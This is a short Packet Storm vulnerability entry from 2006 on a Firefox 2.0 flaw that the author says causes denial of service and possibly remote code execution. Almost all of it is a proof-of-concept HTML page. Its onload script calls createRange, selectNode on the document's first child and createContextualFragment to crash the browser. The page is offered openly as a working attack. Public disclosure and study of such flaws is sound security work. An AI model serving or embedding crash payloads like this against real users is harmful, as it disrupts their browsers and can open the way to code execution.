Firefox2.0-dos.txt

2006-11-01T00:00:00
ID PACKETSTORM:51563
Type packetstorm
Reporter xxxx
Modified 2006-11-01T00:00:00

Description

                                        
                                            `New Flaw in Firefox 2.0: DoS and possible remote code execution  
  
PoC here: http://werterxyz.altervista.org/Firefox2Range.htm  
  
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">  
<html>  
<head>  
<script type="text/javascript">  
function do_crash()  
{  
var range;  
  
range = document.createRange();  
range.selectNode(document.firstChild);  
range.createContextualFragment('<span></span>');  
}  
</script>  
</head>  
<body onload="do_crash()">  
<p>Good bye Firefox!</p>  
</body>  
</html>  
`